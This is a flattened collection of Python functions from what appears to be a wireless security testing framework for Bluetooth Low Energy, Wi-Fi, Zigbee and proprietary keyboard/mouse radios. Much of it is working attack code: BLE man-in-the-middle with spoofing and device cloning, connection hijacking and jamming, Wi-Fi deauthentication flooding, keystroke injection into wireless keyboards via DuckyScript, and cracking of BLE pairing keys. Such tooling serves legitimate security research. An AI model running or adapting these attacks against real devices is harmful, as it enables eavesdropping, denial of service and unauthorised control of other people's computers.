def connect(self, packet): if self.getStage() == BLEMitmStage.WAIT_CONNECTION: io.success("Master connected : " + packet.srcAddr) self.initiatorAddress = packet.srcAddr self.initiatorAddressType = b"\x00" if packet.type == "public" else b"\x01" if self.args["ADVERTISING_STRATEGY"] == "preconnect": if utils.booleanArg(self.args["MASTER_SPOOFING"]): self.a2sEmitter.sendp(ble.BLEDisconnect()) while self.a2sEmitter.isConnected(): utils.wait(seconds=0.01) self.a2sEmitter.setAddress(packet.srcAddr, random=packet.type == "random") address = utils.addressArg(self.args["TARGET"]) connectionType = self.args["CONNECTION_TYPE"] io.info("Connecting to slave " + address + "...") self.a2sEmitter.sendp( ble.BLEConnect(dstAddr=address, type=connectionType, initiatorType=packet.type)) while not self.a2sEmitter.isConnected(): utils.wait(seconds=0.01) if self.args["ADVERTISING_STRATEGY"] == "flood": if utils.booleanArg(self.args["MASTER_SPOOFING"]): self.a2sEmitter.setAddress(packet.srcAddr, random=packet.type == "random") self.connectOnSlave(packet.type) self.setStage(BLEMitmStage.ACTIVE_MITM) io.info("Entering ACTIVE_MITM stage ...")
def send_deauth(self): packet_count = utils.integerArg(self.args["COUNT"]) if packet_count == 0: count = 0 while True: if self.args["MODE"].lower( ) == "both" or self.args["MODE"].lower() == "deauthentication": self.emitter.sendp(self.deauth_packet) if self.args["MODE"].lower( ) == "both" or self.args["MODE"].lower() == "disassociation": self.emitter.sendp(self.disas_packet) utils.wait(seconds=0.05) count += 1 if count % 100 == 0 and utils.booleanArg(self.args['VERBOSE']): io.info("Sent {} deauthentication packets via {}".format( count, self.args["INTERFACE"])) else: for count in range(packet_count): if self.args["MODE"].lower( ) == "both" or self.args["MODE"].lower() == "deauthentication": self.emitter.sendp(self.deauth_packet) if self.args["MODE"].lower( ) == "both" or self.args["MODE"].lower() == "disassociation": self.emitter.sendp(self.disas_packet) utils.wait(seconds=0.05) if count % 100 == 0 and utils.booleanArg(self.args['VERBOSE']): io.info("Sent {} deauthentication packets via {}".format( count, self.args["INTERFACE"]))
def show(self, packet): if utils.booleanArg(self.args["ACK_PACKETS"]) or ( not utils.booleanArg(self.args["ACK_PACKETS"]) and not isinstance(packet, esb.ESBAckResponsePacket)): io.displayPacket(packet) self.lastReceivedFrameTimestamp = utils.now() if self.pcap is not None: self.pcap.sendp(packet)
def run(self): self.receiver = self.getReceiver(interface=self.args["INTERFACE"]) self.emitter = self.getEmitter(interface=self.args["INTERFACE"]) if self.checkCapabilities(): self.receiver.enterSnifferMode( utils.addressArg(self.args["TARGET"])) if self.checkInjectionSyncCapabilities(): if utils.booleanArg(self.args["SYNC"]): self.receiver.enableSync() else: self.receiver.disableSync() else: io.warning( "Synchronized injection is not supported by this interface, the SYNC parameter will be ignored ..." ) self.receiver.setChannel(utils.integerArg(self.args["CHANNEL"])) if self.args["TEXT"] != "": keystrokes = self.addMosartText(self.args["TEXT"]) self.emitter.sendp(*keystrokes) while not self.emitter.isTransmitting(): utils.wait(seconds=0.1) while self.emitter.isTransmitting(): utils.wait(seconds=0.1) elif self.args["DUCKYSCRIPT"] != "": parser = DuckyScriptParser(filename=self.args["DUCKYSCRIPT"]) keystrokes = parser.generatePackets( textFunction=self.addMosartText, initFunction=self.startMosartInjection, keyFunction=self.addMosartKeystroke, sleepFunction=self.addMosartDelay) self.emitter.sendp(*keystrokes) while not self.emitter.isTransmitting(): utils.wait(seconds=0.1) while self.emitter.isTransmitting(): utils.wait(seconds=0.1) elif utils.booleanArg(self.args["INTERACTIVE"]): self.stop = False self.watchKeyboard() while not self.stop: utils.wait(seconds=0.5) return self.ok() else: io.fail("Interface provided (" + str(self.args["INTERFACE"]) + ") is not able to inject frames and run in sniffing mode.") return self.nok()
def initEmittersAndReceivers(self): if self.args["MITM_STRATEGY"] == "injection" and "butterfly" in self.args["INTERFACE"]: sniffModule = utils.loadModule("ble_sniff") sniffModule["INTERFACE"] = self.args["INTERFACE"] sniffModule["SNIFFING_MODE"] = "newConnections" sniffModule["TARGET"] = self.args["TARGET"] sniffModule["MITMING"] = "yes" output = sniffModule.execute() if not output["success"]: return False else: self.args["INTERFACE1"] = output["output"]["INTERFACE1"] self.args["INTERFACE2"] = output["output"]["INTERFACE2"] attackerToSlaveInterface = self.args["INTERFACE1"] attackerToMasterInterface = self.args["INTERFACE2"] self.a2sEmitter = self.getEmitter(interface=attackerToSlaveInterface) self.a2sReceiver = self.getReceiver(interface=attackerToSlaveInterface) self.a2mEmitter = self.getEmitter(interface=attackerToMasterInterface) self.a2mReceiver = self.getReceiver(interface=attackerToMasterInterface) if self.args["MITM_STRATEGY"] != "injection": if not self.a2mEmitter.isAddressChangeable() and utils.booleanArg(self.args["SLAVE_SPOOFING"]): io.warning("Interface "+attackerToMasterInterface+" is not able to change its address : " "Address spoofing will not be enabled !") return True
def onStart(self): # Power Level between -100 and 20 dbm if "TXPOWER" in self.module.args and utils.integerArg( self.module.args['TXPOWER']) != None: self.txPwLvl = struct.pack( '<b', utils.integerArg(self.module.args['TXPOWER'])) else: self.txPwLvl = struct.pack('<b', MOCK_VALUES['gatt']['txPower']) # Local short name if 'NAME' in self.module.args and self.module.args['NAME'] != '': self.shortName = self.module.args['NAME'][0:10] else: self.shortName = MOCK_VALUES['gap']['localName'] if 'PAIRING' in self.module.args: self.pairing = utils.booleanArg(self.module.args['PAIRING']) else: self.pairing = MOCK_VALUES['control']['enable_pairing'] if self.pairing: self.module.pairing(active='passive') self.addPrimaryService() self.startAdv() return True
def run(self): self.emitter = self.getEmitter(interface=self.args["INTERFACE"]) if utils.booleanArg(self.args["SHOW_CAPABILITIES"]): self.displayCapabilities() if "rfstorm" in self.args["INTERFACE"]: interface = self.args["INTERFACE"] mode = self.emitter.getMode() index = str(self.emitter.getDeviceIndex()) io.chart(["Interface","Device Index","Mode"],[[interface,"#"+index,mode]]) return self.ok({"INTERFACE":interface, "INDEX":index, "MODE":mode }) elif ".pcap" in self.args["INTERFACE"]: interface = self.args["INTERFACE"] mode = self.emitter.getMode() io.chart(["Interface","Mode"],[[interface,mode]]) return self.ok({"INTERFACE":interface, "MODE":mode }) return self.nok()
def masterPairingRequest(self, pkt): self.initiatorAddress = self.emitter.getCurrentConnection() self.initiatorAddressType = b"\x00" if self.emitter.getCurrentConnectionMode( ) == "public" else b"\x01" self.responderAddress = self.emitter.getAddress() self.responderAddressType = b"\x00" if self.emitter.getAddressMode( ) == "public" else b"\x01" pkt.show() self.pairingRequest = pkt self.pReq = self.pairingRequest.payload[::-1] self.initiatorAuthReq = ble.AuthReqFlag( data=bytes([pkt.authentication])) self.initiatorInputOutputCapability = ble.InputOutputCapability( data=bytes([pkt.inputOutputCapability])) self.initiatorKeyDistribution = ble.KeyDistributionFlag( data=bytes([pkt.initiatorKeyDistribution])) keyboard = utils.booleanArg(self.args["KEYBOARD"]) yesno = utils.booleanArg(self.args["YESNO"]) display = utils.booleanArg(self.args["DISPLAY"]) ct2 = utils.booleanArg(self.args["CT2"]) mitm = utils.booleanArg(self.args["MITM"]) bonding = utils.booleanArg(self.args["BONDING"]) secureConnections = utils.booleanArg(self.args["SECURE_CONNECTIONS"]) keyPress = utils.booleanArg(self.args["KEYPRESS"]) linkKey = False encKey = self.args["LTK"] != "" and self.args[ "EDIV"] != "" and self.args["RAND"] != "" idKey = self.args["IRK"] != "" and self.args[ "ADDR"] != "" and self.args["ADDR_TYPE"] signKey = self.args["CSRK"] != "" self.responderInputOutputCapability = ble.InputOutputCapability( keyboard=keyboard, display=display, yesno=yesno) self.responderAuthReq = ble.AuthReqFlag( ct2=ct2, mitm=mitm, bonding=bonding, secureConnections=secureConnections, keypress=keyPress) self.responderKeyDistribution = ble.KeyDistributionFlag( linkKey=linkKey, encKey=encKey, idKey=idKey, signKey=signKey) self.pairingResponse = ble.BLEPairingResponse( authentication=self.responderAuthReq.data[0], inputOutputCapability=self.responderInputOutputCapability.data[0], initiatorKeyDistribution=self.responderKeyDistribution.data[0], responderKeyDistribution=self.responderKeyDistribution.data[0]) self.pairingResponse.show() self.pRes = self.pairingResponse.payload[::-1] pairingMethod = self.pairingMethodSelection() io.success("Pairing Method selected : " + self.pairingMethod) self.emitter.sendp(self.pairingResponse)
def run(self): interface = self.args["INTERFACE"] self.emitter = self.getEmitter(interface=interface) if self.checkCapabilities(): if self.emitter.isConnected(): self.emitter.sendp(ble.BLEDisconnect()) while self.emitter.isConnected(): utils.wait(seconds=0.01) address = (self.emitter.getAddress() if self.args["ADVERTISING_ADDRESS"] == "" else utils.addressArg(self.args["ADVERTISING_ADDRESS"])) if address != self.emitter.getAddress(): self.emitter.setAddress(address) if utils.isHexadecimal(self.args["SCANNING_DATA"]): scanningData = bytes.fromhex(self.args["SCANNING_DATA"]) else: scanningData = b"" if utils.isHexadecimal(self.args["ADVERTISING_DATA"]): advertisingData = bytes.fromhex(self.args["ADVERTISING_DATA"]) else: advertisingData = b"" destAddress = ("00:00:00:00:00:00" if self.args["DESTINATION_ADDRESS"] == "" else utils.addressArg(self.args["DESTINATION_ADDRESS"])) intervalMin = utils.integerArg(self.args["INTERVAL_MIN"]) intervalMax = utils.integerArg(self.args["INTERVAL_MAX"]) advertisingType = self.args["ADVERTISING_TYPE"].upper() advertisingAddressType = "public" if self.args[ "ADVERTISING_ADDRESS_TYPE"].lower() == "public" else "random" destinationAddressType = "public" if self.args[ "DESTINATION_ADDRESS_TYPE"].lower() == "public" else "random" self.emitter.setScanningParameters(data=scanningData) self.emitter.setAdvertisingParameters( type=advertisingType, destAddr=destAddress, data=advertisingData, intervalMin=intervalMin, intervalMax=intervalMax, daType=advertisingAddressType, oaType=destinationAddressType) self.emitter.setAdvertising( enable=utils.booleanArg(self.args["ENABLE"])) time = utils.integerArg( self.args['TIME']) if self.args["TIME"] != "" else -1 while time != 0: utils.wait(seconds=1) time -= 1 return self.ok({"INTERFACE": self.args["INTERFACE"]}) else: io.fail("Interface provided (" + str(self.args["INTERFACE"]) + ") is not able to send advertisements.") return self.nok()
def run(self): if self.args["PCAP_FILE"] != "": self.pcap = self.getEmitter(self.args["PCAP_FILE"]) else: self.pcap = None self.initEmittersAndReceivers() if self.args["LTK"] != "": ble.BLELinkLayerCrypto.provideLTK(bytes.fromhex(self.args["LTK"])) if utils.booleanArg(self.args["HIJACKING"]) and not self.checkHijackingCapabilities(): io.fail("Interfaces provided are not able to hijack a connection.") return self.nok() if utils.booleanArg(self.args["JAMMING"]) and not self.checkJammingCapabilities(): io.fail("Interfaces provided are not able to jam a connection.") return self.nok() if self.args["SNIFFING_MODE"].upper() == "newConnections".upper(): if self.checkNewConnectionCapabilities(): target = "FF:FF:FF:FF:FF:FF" if self.args["TARGET"] == "" else utils.addressArg(self.args["TARGET"]) return self.sniffNewConnections(target, utils.integerArg(self.args["CHANNEL"])) else: io.fail("Interfaces provided are not able to sniff new connections.") return self.nok() elif self.args["SNIFFING_MODE"].upper() == "existingConnections".upper(): if self.checkExistingConnectionCapabilities(): accessAddress = utils.integerArg(self.args["ACCESS_ADDRESS"]) if self.args["ACCESS_ADDRESS"]!="" else None crcInit = utils.integerArg(self.args["CRC_INIT"]) if self.args["CRC_INIT"]!="" else None channelMap = utils.integerArg(self.args["CHANNEL_MAP"]) if self.args["CHANNEL_MAP"]!="" else None return self.sniffExistingConnections(self.receivers[0], accessAddress, crcInit, channelMap) else: io.fail("Interfaces provided are not able to sniff existing connections.") return self.nok() elif self.args["SNIFFING_MODE"].upper() == "advertisements".upper(): if self.checkAdvertisementsCapabilities(): target = "FF:FF:FF:FF:FF:FF" if self.args["TARGET"] == "" else utils.addressArg(self.args["TARGET"]) return self.sniffAdvertisements(target, utils.integerArg(self.args["CHANNEL"])) else: io.fail("Interfaces provided are not able to sniff advertisements.") return self.nok() return self.ok()
def sniffNewConnections(self,target, channel): if self.pcap is not None: self.pcap.sniffNewConnections(address=target, channel=channel) if len(self.receivers) == 1: enabled,sweepingSequence = self.sweepingParameter() if enabled: self.receivers[0].setSweepingMode(enable=True,sequence=sweepingSequence) self.receivers[0].sniffNewConnections(address=target, channel=channel) self.receivers[0].onEvent("*", callback=self.show) elif len(self.receivers) == 2: self.receivers[0].sniffNewConnections(address=target,channel=37) self.receivers[1].sniffNewConnections(address=target,channel=38) self.receivers[0].onEvent("*", callback=self.show) self.receivers[1].onEvent("*", callback=self.show) elif len(self.receivers) == 3: self.receivers[0].sniffNewConnections(address=target,channel=37) self.receivers[1].sniffNewConnections(address=target,channel=38) self.receivers[2].sniffNewConnections(address=target,channel=39) self.receivers[0].onEvent("*", callback=self.show) self.receivers[1].onEvent("*", callback=self.show) self.receivers[2].onEvent("*", callback=self.show) else: io.fail("No sniffer detected !") return self.nok() while all([not receiver.isSynchronized() for receiver in self.receivers]): utils.wait(seconds=0.001) for receiver in self.receivers: if receiver.isSynchronized(): self.displayConnection(self.receivers.index(receiver)) if ("microbit" in receiver.interface and (utils.booleanArg(self.args["HIJACKING"]) or utils.booleanArg(self.args["JAMMING"]))): receiver.removeCallbacks() return self.sniffExistingConnections( receiver, receiver.getAccessAddress(), receiver.getCrcInit(), receiver.getChannelMap() ) while all([receiver.isSynchronized() for receiver in self.receivers]): utils.wait(seconds=0.05) utils.wait(seconds=1) return self.ok()
def onStart(self): self.emitter = self.module.emitter self.receiver = self.module.receiver self.target = utils.addressArg(self.module.target) self.lock = Lock() io.info("Following mode disabled by the scenario.") self.module.stopFollowing() io.info("Generating attack stream ...") attackStream = self.startLogitechInjection() self.mode = None if "TEXT" in self.module.args and self.module.args["TEXT"] != "": self.mode = "text" text = self.module.args["TEXT"] io.info("Text injection: "+text) attackStream += self.addLogitechDelay(duration=100) attackStream += self.addLogitechText(text) elif "INTERACTIVE" in self.module.args and utils.booleanArg(self.module.args["INTERACTIVE"]): self.mode = "interactive" io.info("Interactive mode") self.keepAliveThread = wireless.StoppableThread(self.keepAlive) self.keepAliveThread.start() elif "DUCKYSCRIPT" in self.module.args and self.module.args["DUCKYSCRIPT"] != "": self.mode = "duckyscript" io.info("Duckyscript injection: "+self.module.args["DUCKYSCRIPT"]) parser = parsers.DuckyScriptParser(filename=self.args["DUCKYSCRIPT"]) attackStream = parser.generatePackets( textFunction=self.addLogitechText, initFunction=self.startLogitechInjection, keyFunction=self.addLogitechKeystroke, sleepFunction=self.addLogitechDelay ) else: io.fail("You must provide one of the following parameters:\n\tINTERACTIVE : live keystroke injection\n\tTEXT : simple text injection\n\tDUCKYSCRIPT : duckyscript injection") self.module.stopScenario() return True io.info("Looking for target "+str(self.target)+"...") while not self.emitter.scan(): utils.wait(seconds=0.1) io.success("Target found !") io.info("Injecting ...") self.emitter.sendp(*attackStream) if self.mode != "interactive": while not self.emitter.isTransmitting(): utils.wait(seconds=0.5) while self.emitter.isTransmitting(): utils.wait(seconds=0.5) self.module.stopScenario() return True
def dongleToDevice(self, pkt): if self.stage != ESBMitmStage.SCAN: if pkt.payload == b"" and self.stage == ESBMitmStage.DESYNC: self.ackCount += 1 if self.ackCount >= 10: io.success("Acknowledgment received on channel " + str(self.dongleReceiver.getChannel()) + "!") io.info("Entering ACTIVE_MITM stage ...") self.setStage(ESBMitmStage.ACTIVE_MITM) if self.stage == ESBMitmStage.ACTIVE_MITM: self.ackPacket(pkt) if utils.booleanArg(self.args["SHOW_ACK"]): pkt.show()
def sniffExistingConnections(self, receiver,accessAddress, crcInit, channelMap): if utils.booleanArg(self.args["JAMMING"]): receiver.setJamming(enable=True) if utils.booleanArg(self.args["HIJACKING_MASTER"]): receiver.setHijacking(target="master",enable=True) receiver.sniffExistingConnections(accessAddress,crcInit,channelMap ) if not utils.booleanArg(self.args["HIJACKING_MASTER"]): receiver.onEvent("*", callback=self.show) while not receiver.isSynchronized(): utils.wait(seconds=0.001) self.displayConnection() if utils.booleanArg(self.args["HIJACKING_MASTER"]): io.info("Hijacking in progress ...") while not receiver.isConnected(): utils.wait(seconds=0.001) receiver.removeCallbacks() return self.ok({"INTERFACE":receiver.interface}) else: while receiver.isSynchronized(): utils.wait(seconds=0.001) return self.ok()
def cloneStage(self,address,data,dataResponse,intervalMin, intervalMax,addrType): io.info("Entering CLONE stage ...") self.setStage(BLEMitmStage.CLONE) if self.args["MITM_STRATEGY"] == "flood": intervalMin = 200 intervalMax = 201 if utils.booleanArg(self.args["SLAVE_SPOOFING"]) and address != self.a2mEmitter.getAddress(): self.a2mEmitter.setAddress(address, random=addrType) self.a2mEmitter.setScanningParameters(data=dataResponse) self.a2mEmitter.setAdvertisingParameters(data=data, intervalMin=intervalMin, intervalMax=intervalMax, daType=addrType, oaType=addrType)
def run(self): self.receiver = self.getReceiver(interface=self.args["INTERFACE"]) self.emitter = self.getEmitter(interface=self.args["INTERFACE"]) if self.checkCapabilities(): self.receiver.onEvent("*",callback=self.scan) accessPoints = {} channel = 0 for i in range(utils.integerArg(self.args['TIME'])): self.receiver.setChannel(channel+1) self.emitter.sendp(wifi.WifiProbeRequest(srcMac = 'FF:FF:FF:FF:FF:FF', destMac= 'FF:FF:FF:FF:FF:FF', emitMac = "FF:FF:FF:FF:FF:FF")) channel = (channel+1) % 14 utils.wait(seconds=1) if utils.booleanArg(self.args["ACCESS_POINTS"]): self.updateAccessPoints() if utils.booleanArg(self.args["STATIONS"]): self.updateStations() output = self.generateOutput() return self.ok(output) else: io.fail("Interface provided ("+str(self.args["INTERFACE"])+") is not able to scan and run in monitor mode.") return self.nok()
def run(self): self.receiver = self.getReceiver(interface=self.args["INTERFACE"]) if self.checkSniffingCapabilities(): self.target = "FF:FF:FF:FF" if self.args[ "TARGET"] == "" else self.args["TARGET"].upper() if self.target == "FF:FF:FF:FF": self.receiver.enterPromiscuousMode() else: self.receiver.enterSnifferMode(self.target) if self.args["PCAP_FILE"] != "": self.pcap = self.getEmitter(interface=self.args["PCAP_FILE"]) if utils.booleanArg(self.args["DONGLE_PACKETS"]): self.receiver.enableDonglePackets() else: self.receiver.disableDonglePackets() if self.args["CHANNEL"] == "" or self.args["CHANNEL"].lower( ) == "auto": while not self.find(): io.info("Retrying ...") else: self.receiver.setChannel(utils.integerArg( self.args["CHANNEL"])) self.receiver.onEvent("*", callback=self.show) time = utils.integerArg( self.args['TIME']) if self.args["TIME"] != "" else None start = utils.now() while utils.now() - start <= time if time is not None else True: utils.wait(seconds=0.5) self.receiver.removeCallbacks() if self.pcap is not None: self.pcap.stop() output = {} output["MOUSE_FILE"] = self.args["MOUSE_FILE"] output["PCAP_FILE"] = self.args["PCAP_FILE"] output["TARGET"] = self.target output["CHANNEL"] = str(int(self.receiver.getChannel())) return self.ok(output) else: io.fail("Interface provided (" + str(self.args["INTERFACE"]) + ") is not able to run in sniffing mode.") return self.nok()
def initEmittersAndReceivers(self): attackerToSlaveInterface = self.args["INTERFACE1"] attackerToMasterInterface = self.args["INTERFACE2"] self.a2sEmitter = self.getEmitter(interface=attackerToSlaveInterface) self.a2sReceiver = self.getReceiver(interface=attackerToSlaveInterface) self.a2mEmitter = self.getEmitter(interface=attackerToMasterInterface) self.a2mReceiver = self.getReceiver( interface=attackerToMasterInterface) if not self.a2mEmitter.isAddressChangeable() and utils.booleanArg( self.args["SLAVE_SPOOFING"]): io.warning("Interface " + attackerToMasterInterface + " is not able to change its address : " "Address spoofing will not be enabled !")
def run(self): self.emitter = self.getEmitter(interface=self.args["INTERFACE"]) if utils.booleanArg(self.args["SHOW_CAPABILITIES"]): self.displayCapabilities() interface = self.args["INTERFACE"] address = self.emitter.getAddress() mode = self.emitter.getMode() channel = self.emitter.getChannel() io.chart(["Interface", "MAC Address", "Mode", "Channel"], [[interface, address, mode, channel]]) return self.ok({ "INTERFACE": interface, "ADDRESS": address, "MODE": mode, "CHANNEL": channel })
def run(self): self.emitter = self.getEmitter(interface=self.args["INTERFACE"]) if utils.booleanArg(self.args["SHOW_CAPABILITIES"]): self.displayCapabilities() if "rzusbstick" in self.args["INTERFACE"]: interface = self.args["INTERFACE"] index = str(self.emitter.getDeviceIndex()) serial = str(self.emitter.getSerial()) firmwareVersion = str(self.emitter.getFirmwareVersion()) mode = str(self.emitter.getMode()) io.chart(["Interface","Device Index","Serial number","Firmware Version", "Mode"],[[interface,"#"+index,serial, firmwareVersion, mode]]) return self.ok({"INTERFACE":interface, "INDEX":index, "SERIAL":serial, "FIRMWARE_VERSION":firmwareVersion, "MODE":mode }) elif "hackrf" in self.args["INTERFACE"]: interface = self.args["INTERFACE"] index = str(self.emitter.getDeviceIndex()) serial = str(self.emitter.getSerial()) firmwareVersion = str(self.emitter.getFirmwareVersion()) apiVersionMajor,apiVersionMinor = self.emitter.getAPIVersion() apiVersion = str(apiVersionMajor)+"."+str(apiVersionMinor) boardName = self.emitter.getBoardName() boardID = str(self.emitter.getBoardID()) io.chart(["Interface","Device Index","Serial number","Board Name", "Board ID","Firmware Version", "API Version"],[[interface,"#"+index,serial,boardName, boardID,firmwareVersion, apiVersion]]) return self.ok({"INTERFACE":interface, "INDEX":index, "SERIAL":serial, "FIRMWARE_VERSION":firmwareVersion, "API_VERSION":apiVersion, "BOARD_NAME":boardName, "BOARD_ID":boardID }) elif ".pcap" in self.args["INTERFACE"]: interface = self.args["INTERFACE"] mode = self.emitter.getMode() io.chart(["Interface","Mode"],[[interface,mode]]) return self.ok({"INTERFACE":interface, "MODE":mode }) return self.nok()
def show(self,packet): advMode = self.args["SNIFFING_MODE"].upper() == "advertisements".upper() isAnAdv = isinstance(packet, ble.BLEAdvertisement) isAnEmpty = isinstance(packet,ble.BLEEmptyPDU) unknownInName = "Unknown" in packet.name isConnectReq = isinstance(packet,ble.BLEConnectRequest) addressMatching = ( isConnectReq and packet.addr == utils.addressArg(self.args["TARGET"]) or self.args["TARGET"] == "" or (hasattr(packet,"addr") and packet.addr == utils.addressArg(self.args["TARGET"]))) if ( (not advMode and (not isAnAdv or isConnectReq) and not isAnEmpty and not unknownInName) or (advMode and isAnAdv and addressMatching) ): self.onPacket(packet) if self.pcap is not None: self.pcap.sendp(packet) if utils.booleanArg(self.args["CRACK_KEY"]): if isConnectReq: self.initiatorAddress = packet.srcAddr self.initiatorAddressType = packet.srcAddrType self.responderAddress = packet.dstAddr self.responderAddressType = packet.dstAddrType if isinstance(packet, ble.BLEPairingRequest): self.pReq = packet.payload[::-1] if isinstance(packet,ble.BLEPairingResponse): self.pRes = packet.payload[::-1] if isinstance(packet,ble.BLEPairingConfirm) and self.mConfirm is None: self.mConfirm = packet.confirm[::-1] if isinstance(packet,ble.BLEPairingRandom) and self.mRand is not None and self.sRand is None: self.sRand = packet.random[::-1] while self.temporaryKey is None and not self.failure: pass if self.failure: self.errorDuringCracking() else: io.info("Derivating Short Term Key ...") self.shortTermKey = ble.BLECrypto.s1(self.temporaryKey,self.mRand,self.sRand)[::-1] io.success("Short Term Key found : "+ self.shortTermKey.hex()) ble.BLELinkLayerCrypto.provideLTK(self.shortTermKey) if isinstance(packet,ble.BLEPairingRandom) and self.mRand is None: self.mRand = packet.random[::-1] self.failure = not self.crackTemporaryKey()
def scanStage(self,packet): if utils.booleanArg(self.args["SHOW_SCANNING"]): packet.show() if self.getStage() == BLEMitmStage.SCAN: if utils.addressArg(self.args["TARGET"]) == packet.addr.upper(): if packet.type == "ADV_IND": io.success("Found corresponding advertisement !") self.address = utils.addressArg(self.args["TARGET"]) data = packet.getRawDatas() self.intervalMin = packet.intervalMin self.intervalMax = packet.intervalMax self.addrType = packet.addrType self.dataAdvInd = data elif packet.type == "SCAN_RSP": self.dataScanRsp = packet.getRawDatas() if self.dataAdvInd is not None and self.dataScanRsp is not None: self.cloneStage(self.address,self.dataAdvInd,self.dataScanRsp,self.intervalMin,self.intervalMax,self.addrType)
def run(self): self.receiver = self.getReceiver(interface=self.args["INTERFACE"]) self.emitter = self.getEmitter(interface=self.args["INTERFACE"]) if self.checkCapabilities(): self.receiver.onEvent("*", callback=self.updateDevices) start = utils.now() startChannel = utils.integerArg(self.args["START_CHANNEL"]) endChannel = utils.integerArg(self.args["END_CHANNEL"]) numberOfChannels = endChannel + 1 - startChannel channels = list(range(startChannel, endChannel + 1)) i = 0 while self.args["TIME"] == "" or utils.now( ) - start < utils.integerArg(self.args["TIME"]): if startChannel != endChannel: io.progress(i, total=numberOfChannels, suffix="Channel: " + (" " if len(str(channels[i])) == 1 else "") + str(channels[i])) self.receiver.setChannel(channels[i]) if utils.booleanArg(self.args["ACTIVE"]): self.emitter.sendp( zigbee.ZigbeeBeaconRequest(sequenceNumber=1, destPanID=0xFFFF, destAddr=0xFFFF)) utils.wait(seconds=0.1) i = (i + 1) % len(channels) if startChannel != endChannel: sys.stdout.write(" " * 100 + "\r") if len(self.devices) == 0: return self.nok() else: return self.generateOutput() else: io.fail("Interface provided (" + str(self.args["INTERFACE"]) + ") is not able to sniff and inject frames.") return self.nok()
def onStart(self): self.emitter = self.module.emitter self.receiver = self.module.receiver self.server = self.module.server self.mode = "text" self.enableAdvertising() self.initializeServices() if "PAIRING" in self.module.args and self.module.args["PAIRING"].lower( ) == "passive": self.module.pairing(active="passive") io.info("Generating attack stream ...") self.attackStream = self.startHIDoverGATTInjection() self.mode = None if "TEXT" in self.module.args and self.module.args["TEXT"] != "": self.mode = "text" text = self.module.args["TEXT"] io.info("Text injection: " + text) self.attackStream += self.addHIDoverGATTText(text) io.info("You can start the injection by pressing [SPACE]") elif "INTERACTIVE" in self.module.args and utils.booleanArg( self.module.args["INTERACTIVE"]): self.mode = "interactive" io.info("Interactive mode") elif "DUCKYSCRIPT" in self.module.args and self.module.args[ "DUCKYSCRIPT"] != "": self.mode = "duckyscript" io.info("Duckyscript injection: " + self.module.args["DUCKYSCRIPT"]) parser = parsers.DuckyScriptParser( filename=self.args["DUCKYSCRIPT"]) self.attackStream = parser.generatePackets( textFunction=self.addHIDoverGATTText, initFunction=self.startHIDoverGATTInjection, keyFunction=self.addHIDoverGATTKeystroke, sleepFunction=self.addHIDoverGATTDelay) io.info("You can start the injection by pressing [SPACE]") return True
def run(self): self.emitter = self.getEmitter(interface=self.args["INTERFACE"]) if utils.booleanArg(self.args["SHOW_CAPABILITIES"]): self.displayCapabilities() if "irma" in self.args["INTERFACE"]: interface = self.args["INTERFACE"] index = str(self.emitter.getDeviceIndex()) port = self.emitter.getSerialPort() frequency = str(self.emitter.getFrequency()) io.chart(["Interface", "Device Index", "Serial Port", "Frequency"], [[interface, "#" + index, port, frequency + " kHz"]]) return self.ok({ "INTERFACE": interface, "INDEX": index, "PORT": port, "FREQUENCY": frequency }) return self.nok()
def run(self): self.receiver = self.getReceiver(self.args["INTERFACE"]) self.receiver.enterPromiscuousMode() if self.checkPromiscuousSniffingCapabilities(): self.receiver.onEvent("*", callback=self.add) if utils.booleanArg(self.args["DONGLE_PACKETS"]): self.receiver.enableDonglePackets() else: self.receiver.disableDonglePackets() start = utils.now() startChannel = utils.integerArg(self.args["START_CHANNEL"]) endChannel = utils.integerArg(self.args["END_CHANNEL"]) numberOfChannels = endChannel + 1 - startChannel channels = list(range(startChannel, endChannel + 1)) i = 0 while self.args["TIME"] == "" or utils.now( ) - start < utils.integerArg(self.args["TIME"]): io.progress(i, total=numberOfChannels, suffix="Channel: " + (" " if len(str(channels[i])) == 1 else "") + str(channels[i])) self.receiver.setChannel(channels[i]) utils.wait(seconds=0.1) self.displayDevices() i = (i + 1) % len(channels) sys.stdout.write(" " * 100 + "\r") if len(self.devices) >= 1: return self.ok(self.generateOutput()) else: return self.nok() else: io.fail("Interface provided (" + str(self.args["INTERFACE"]) + ") is not able to run in promiscuous mode.") return self.nok()
def run(self): self.receiver = self.getReceiver(interface=self.args["INTERFACE"]) self.emitter = self.getEmitter(interface=self.args["INTERFACE"]) if self.checkCapabilities(): self.receiver.enterSnifferMode( utils.addressArg(self.args["TARGET"])) if self.checkInjectionSyncCapabilities(): if utils.booleanArg(self.args["SYNC"]): self.receiver.enableSync() else: self.receiver.disableSync() else: io.warning( "Synchronized injection is not supported by this interface, the SYNC parameter will be ignored ..." ) self.pcapReceiver = self.getReceiver( interface=self.args["PCAP_FILE"]) self.receiver.setChannel(utils.integerArg(self.args["CHANNEL"])) io.info("Extracting packet stream from PCAP ...") stream = self.pcapReceiver.generateStream() io.success("Packet stream successfully extracted !") io.info("Injecting ...") self.emitter.sendp(*stream) while not self.emitter.isTransmitting(): utils.wait(seconds=0.1) while self.emitter.isTransmitting(): utils.wait(seconds=0.1) io.success("Injection done !") return self.ok() else: io.fail("Interface provided (" + str(self.args["INTERFACE"]) + ") is not able to inject frames and run in sniffing mode.") return self.nok()
def run(self): self.emitter = self.getEmitter(interface=self.args['INTERFACE']) self.receiver = self.getReceiver(interface=self.args['INTERFACE']) self.ack = False self.ackLock = Lock() self.followThread = None self.currentChannel = self.emitter.getChannel() self.initializeCallbacks() if self.checkCommunicationCapabilities(): if self.args["TARGET"] != "": self.emitter.enterSnifferMode(self.args["TARGET"]) self.target = self.args["TARGET"].upper() self.updatePrompt(self.target) if utils.booleanArg(self.args["FOLLOW_MODE"]): io.info("Enabling following mode ...") self.startFollowing() else: self.updatePrompt() if self.loadScenario(): self.scenarioStop = False io.info("Scenario loaded !") self.startScenario() while not self.scenarioStop: utils.wait(seconds=0.1) self.endScenario() else: interpreter.Interpreter.loop(self) self.stopFollowing() return self.ok() else: io.fail("Interface provided ("+str(self.args["INTERFACE"])+") is not able to communicate as a PTX device.") return self.nok()
